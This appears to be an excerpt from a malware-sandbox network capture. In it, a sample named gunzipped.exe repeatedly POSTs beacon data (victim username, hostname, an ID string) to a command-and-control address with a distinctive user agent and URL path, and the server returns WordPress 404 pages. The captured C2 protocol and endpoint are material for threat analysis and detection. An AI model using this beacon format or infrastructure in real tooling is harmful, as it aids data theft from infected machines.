Apr 17, 2024 03:18:19.006145954 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:18:19.006184101 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:18:19.006222010 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:18:19.006259918 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:18:19.006299019 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:18:19.006341934 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.5	49771	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:18:19.349313974 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:18:19.557465076 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:18:20.481523037 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:18:19 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:18:20.481553078 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:18:20.481570959 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:18:20.481589079 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:18:20.481622934 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:18:20.481642962 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:18:20.481662035 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:18:20.481678963 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:18:20.481697083 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:18:20.481714964 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.5	49772	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:18:20.835118055 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:18:21.043060064 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:18:22.013158083 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:18:20 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:18:22.013219118 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:18:22.013257027 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:18:22.013293028 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:18:22.013334036 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:18:22.013370991 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:18:22.013408899 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:18:22.013452053 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
